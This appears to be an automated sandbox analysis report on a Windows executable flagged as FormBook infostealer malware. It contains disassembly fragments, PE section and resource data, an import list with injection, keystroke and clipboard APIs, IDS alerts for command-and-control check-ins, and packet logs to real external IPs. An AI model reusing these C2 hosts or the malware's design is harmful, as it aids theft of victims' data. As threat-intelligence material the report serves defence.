                                                                                    pop ebp
                                                                                    retn 0004h
                                                                                    and dword ptr [ecx+04h], 00000000h
                                                                                    mov eax, ecx
                                                                                    and dword ptr [ecx+08h], 00000000h
                                                                                    mov dword ptr [ecx+04h], 0049FDF8h
                                                                                    mov dword ptr [ecx], 0049FDF0h
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    push dword ptr [ebp+08h]
                                                                                    mov esi, ecx
                                                                                    call 00007F4370EA118Ah
                                                                                    mov dword ptr [esi], 0049FE0Ch
                                                                                    mov eax, esi
                                                                                    pop esi
                                                                                    pop ebp
                                                                                    retn 0004h
                                                                                    and dword ptr [ecx+04h], 00000000h
                                                                                    mov eax, ecx
                                                                                    and dword ptr [ecx+08h], 00000000h
                                                                                    mov dword ptr [ecx+04h], 0049FE14h
                                                                                    mov dword ptr [ecx], 0049FE0Ch
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    mov esi, ecx
                                                                                    lea eax, dword ptr [esi+04h]
                                                                                    mov dword ptr [esi], 0049FDD0h
                                                                                    and dword ptr [eax], 00000000h
                                                                                    and dword ptr [eax+04h], 00000000h
                                                                                    push eax
                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                    add eax, 04h
                                                                                    push eax
                                                                                    call 00007F4370EA3D7Dh
                                                                                    pop ecx
                                                                                    pop ecx
                                                                                    mov eax, esi
                                                                                    pop esi
                                                                                    pop ebp
                                                                                    retn 0004h
                                                                                    lea eax, dword ptr [ecx+04h]
                                                                                    mov dword ptr [ecx], 0049FDD0h
                                                                                    push eax
                                                                                    call 00007F4370EA3DC8h
                                                                                    pop ecx
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    mov esi, ecx
                                                                                    lea eax, dword ptr [esi+04h]
                                                                                    mov dword ptr [esi], 0049FDD0h
                                                                                    push eax
                                                                                    call 00007F4370EA3DB1h
                                                                                    test byte ptr [ebp+08h], 00000001h
                                                                                    pop ecx
                                                                                    Programming Language:
                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x5a7cc.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x12f0000x7594.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rsrc0xd40000x5a7cc0x5a80023aeeb00fc20066fb454248d628e679fFalse0.9279097246201657data7.892585797528113IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x12f0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                    RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                    RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                    RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                    RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                    RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                    RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                    RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                    RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                    RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                    RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                    RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                                                                    RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                    RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                                                                    RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                    RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                    RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                    RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                    RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                    RT_RCDATA0xdc7b80x51a93data1.0003318554306198
                                                                                    RT_GROUP_ICON0x12e24c0x76dataEnglishGreat Britain0.6610169491525424
                                                                                    RT_GROUP_ICON0x12e2c40x14dataEnglishGreat Britain1.25
                                                                                    RT_GROUP_ICON0x12e2d80x14dataEnglishGreat Britain1.15
                                                                                    RT_GROUP_ICON0x12e2ec0x14dataEnglishGreat Britain1.25
                                                                                    RT_VERSION0x12e3000xdcdataEnglishGreat Britain0.6181818181818182
                                                                                    RT_MANIFEST0x12e3dc0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                                    DLLImport
                                                                                    WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                                    VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                    MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                                    WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                                    PSAPI.DLLGetProcessMemoryInfo
                                                                                    IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                                    USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                                    UxTheme.dllIsThemeActive
                                                                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                                    USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                                    GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                                    SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                    OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    EnglishGreat Britain
                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2024-12-19T06:41:33.317202+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449736154.215.72.11080TCP
                                                                                    2024-12-19T06:42:07.266008+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449762116.50.37.24480TCP
                                                                                    2024-12-19T06:43:30.751236+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44982185.159.66.9380TCP
                                                                                    2024-12-19T06:43:45.540170+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44999091.195.240.9480TCP
                                                                                    2024-12-19T06:44:13.817243+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45001966.29.149.4680TCP
                                                                                    2024-12-19T06:44:29.103690+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450023195.110.124.13380TCP
                                                                                    2024-12-19T06:45:00.511950+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450027217.196.55.20280TCP
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 19, 2024 06:41:31.646918058 CET4973680192.168.2.4154.215.72.110
                                                                                    Dec 19, 2024 06:41:31.767247915 CET8049736154.215.72.110192.168.2.4
                                                                                    Dec 19, 2024 06:41:31.767390013 CET4973680192.168.2.4154.215.72.110
                                                                                    Dec 19, 2024 06:41:31.769866943 CET4973680192.168.2.4154.215.72.110
                                                                                    Dec 19, 2024 06:41:31.899431944 CET8049736154.215.72.110192.168.2.4
                                                                                    Dec 19, 2024 06:41:33.316937923 CET8049736154.215.72.110192.168.2.4
                                                                                    Dec 19, 2024 06:41:33.316992998 CET8049736154.215.72.110192.168.2.4
                                                                                    Dec 19, 2024 06:41:33.317202091 CET4973680192.168.2.4154.215.72.110
                                                                                    Dec 19, 2024 06:41:33.320487976 CET4973680192.168.2.4154.215.72.110
                                                                                    Dec 19, 2024 06:41:33.440450907 CET8049736154.215.72.110192.168.2.4
                                                                                    Dec 19, 2024 06:41:57.597202063 CET4973880192.168.2.4116.50.37.244
                                                                                    Dec 19, 2024 06:41:57.716866970 CET8049738116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:41:57.717096090 CET4973880192.168.2.4116.50.37.244
                                                                                    Dec 19, 2024 06:41:57.719249964 CET4973880192.168.2.4116.50.37.244
                                                                                    Dec 19, 2024 06:41:57.838936090 CET8049738116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:41:59.226922989 CET8049738116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:41:59.226975918 CET8049738116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:41:59.227044106 CET4973880192.168.2.4116.50.37.244
                                                                                    Dec 19, 2024 06:41:59.233823061 CET4973880192.168.2.4116.50.37.244
                                                                                    Dec 19, 2024 06:42:00.252187014 CET4974580192.168.2.4116.50.37.244
                                                                                    Dec 19, 2024 06:42:00.372149944 CET8049745116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:42:00.372237921 CET4974580192.168.2.4116.50.37.244
                                                                                    Dec 19, 2024 06:42:00.373928070 CET4974580192.168.2.4116.50.37.244
                                                                                    Dec 19, 2024 06:42:00.493722916 CET8049745116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:42:01.890038967 CET4974580192.168.2.4116.50.37.244
                                                                                    Dec 19, 2024 06:42:01.893330097 CET8049745116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:42:01.893377066 CET8049745116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:42:01.893491030 CET4974580192.168.2.4116.50.37.244
                                                                                    Dec 19, 2024 06:42:01.893527985 CET4974580192.168.2.4116.50.37.244
                                                                                    Dec 19, 2024 06:42:02.010195971 CET8049745116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:42:02.010281086 CET4974580192.168.2.4116.50.37.244
                                                                                    Dec 19, 2024 06:42:02.933485985 CET4975680192.168.2.4116.50.37.244
                                                                                    Dec 19, 2024 06:42:03.053248882 CET8049756116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:42:03.053375006 CET4975680192.168.2.4116.50.37.244
                                                                                    Dec 19, 2024 06:42:03.085382938 CET4975680192.168.2.4116.50.37.244
                                                                                    Dec 19, 2024 06:42:03.205595970 CET8049756116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:42:03.205637932 CET8049756116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:42:03.205667019 CET8049756116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:42:03.205696106 CET8049756116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:42:03.205750942 CET8049756116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:42:03.205780029 CET8049756116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:42:03.205807924 CET8049756116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:42:03.205835104 CET8049756116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:42:03.205862999 CET8049756116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:42:04.568470955 CET8049756116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:42:04.568527937 CET8049756116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:42:04.568644047 CET4975680192.168.2.4116.50.37.244
                                                                                    Dec 19, 2024 06:42:04.608958960 CET4975680192.168.2.4116.50.37.244
                                                                                    Dec 19, 2024 06:42:05.627605915 CET4976280192.168.2.4116.50.37.244
                                                                                    Dec 19, 2024 06:42:05.747836113 CET8049762116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:42:05.748076916 CET4976280192.168.2.4116.50.37.244
                                                                                    Dec 19, 2024 06:42:05.749855042 CET4976280192.168.2.4116.50.37.244
                                                                                    Dec 19, 2024 06:42:05.869577885 CET8049762116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:42:07.265697956 CET8049762116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:42:07.265937090 CET8049762116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:42:07.266007900 CET4976280192.168.2.4116.50.37.244
                                                                                    Dec 19, 2024 06:42:07.268608093 CET4976280192.168.2.4116.50.37.244
                                                                                    Dec 19, 2024 06:42:07.388958931 CET8049762116.50.37.244192.168.2.4
                                                                                    Dec 19, 2024 06:42:21.317950010 CET4979880192.168.2.485.159.66.93
                                                                                    Dec 19, 2024 06:42:21.437760115 CET804979885.159.66.93192.168.2.4
                                                                                    Dec 19, 2024 06:42:21.437860012 CET4979880192.168.2.485.159.66.93
                                                                                    Dec 19, 2024 06:42:21.440001011 CET4979880192.168.2.485.159.66.93
                                                                                    Dec 19, 2024 06:42:21.559855938 CET804979885.159.66.93192.168.2.4
                                                                                    Dec 19, 2024 06:42:22.952569962 CET4979880192.168.2.485.159.66.93
                                                                                    Dec 19, 2024 06:42:23.073009968 CET804979885.159.66.93192.168.2.4
                                                                                    Dec 19, 2024 06:42:23.073112011 CET4979880192.168.2.485.159.66.93
                                                                                    Dec 19, 2024 06:42:23.971393108 CET4980480192.168.2.485.159.66.93
                                                                                    Dec 19, 2024 06:42:24.091648102 CET804980485.159.66.93192.168.2.4
                                                                                    Dec 19, 2024 06:42:24.091746092 CET4980480192.168.2.485.159.66.93
                                                                                    Dec 19, 2024 06:42:24.093766928 CET4980480192.168.2.485.159.66.93
                                                                                    Dec 19, 2024 06:42:24.213860035 CET804980485.159.66.93192.168.2.4
                                                                                    Dec 19, 2024 06:42:25.608922005 CET4980480192.168.2.485.159.66.93
                                                                                    Dec 19, 2024 06:42:25.728950024 CET804980485.159.66.93192.168.2.4
                                                                                    Dec 19, 2024 06:42:25.729037046 CET4980480192.168.2.485.159.66.93
                                                                                    Dec 19, 2024 06:42:26.628771067 CET4981580192.168.2.485.159.66.93
                                                                                    Dec 19, 2024 06:42:26.748621941 CET804981585.159.66.93192.168.2.4
                                                                                    Dec 19, 2024 06:42:26.748723030 CET4981580192.168.2.485.159.66.93
                                                                                    Dec 19, 2024 06:42:26.750750065 CET4981580192.168.2.485.159.66.93
                                                                                    Dec 19, 2024 06:42:26.870780945 CET804981585.159.66.93192.168.2.4
                                                                                    Dec 19, 2024 06:42:26.870817900 CET804981585.159.66.93192.168.2.4
                                                                                    Dec 19, 2024 06:42:26.870870113 CET804981585.159.66.93192.168.2.4
                                                                                    Dec 19, 2024 06:42:26.870898962 CET804981585.159.66.93192.168.2.4
                                                                                    Dec 19, 2024 06:42:26.870929956 CET804981585.159.66.93192.168.2.4
                                                                                    Dec 19, 2024 06:42:26.870956898 CET804981585.159.66.93192.168.2.4
                                                                                    Dec 19, 2024 06:42:26.871035099 CET804981585.159.66.93192.168.2.4
                                                                                    Dec 19, 2024 06:42:26.871068001 CET804981585.159.66.93192.168.2.4
                                                                                    Dec 19, 2024 06:42:26.871115923 CET804981585.159.66.93192.168.2.4
                                                                                    Dec 19, 2024 06:42:28.268449068 CET4981580192.168.2.485.159.66.93
                                                                                    Dec 19, 2024 06:42:28.388860941 CET804981585.159.66.93192.168.2.4
                                                                                    Dec 19, 2024 06:42:28.389388084 CET4981580192.168.2.485.159.66.93
                                                                                    Dec 19, 2024 06:42:29.285129070 CET4982180192.168.2.485.159.66.93
                                                                                    Dec 19, 2024 06:42:29.405189991 CET804982185.159.66.93192.168.2.4
                                                                                    Dec 19, 2024 06:42:29.405312061 CET4982180192.168.2.485.159.66.93
                                                                                    Dec 19, 2024 06:42:29.407360077 CET4982180192.168.2.485.159.66.93
                                                                                    Dec 19, 2024 06:42:29.527057886 CET804982185.159.66.93192.168.2.4
                                                                                    Dec 19, 2024 06:43:30.750988960 CET804982185.159.66.93192.168.2.4
                                                                                    Dec 19, 2024 06:43:30.751115084 CET804982185.159.66.93192.168.2.4
                                                                                    Dec 19, 2024 06:43:30.751235962 CET4982180192.168.2.485.159.66.93
                                                                                    Dec 19, 2024 06:43:30.753904104 CET4982180192.168.2.485.159.66.93
                                                                                    Dec 19, 2024 06:43:30.873419046 CET804982185.159.66.93192.168.2.4
                                                                                    Dec 19, 2024 06:43:36.145315886 CET4996880192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:36.264887094 CET804996891.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:36.265371084 CET4996880192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:36.268707037 CET4996880192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:36.388293028 CET804996891.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:37.542874098 CET804996891.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:37.542915106 CET804996891.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:37.542984009 CET4996880192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:37.781064034 CET4996880192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:38.803508997 CET4997880192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:38.923650026 CET804997891.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:38.923774958 CET4997880192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:38.925314903 CET4997880192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:39.045030117 CET804997891.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:40.201807022 CET804997891.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:40.201901913 CET804997891.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:40.208729029 CET4997880192.168.2.491.195.240.94
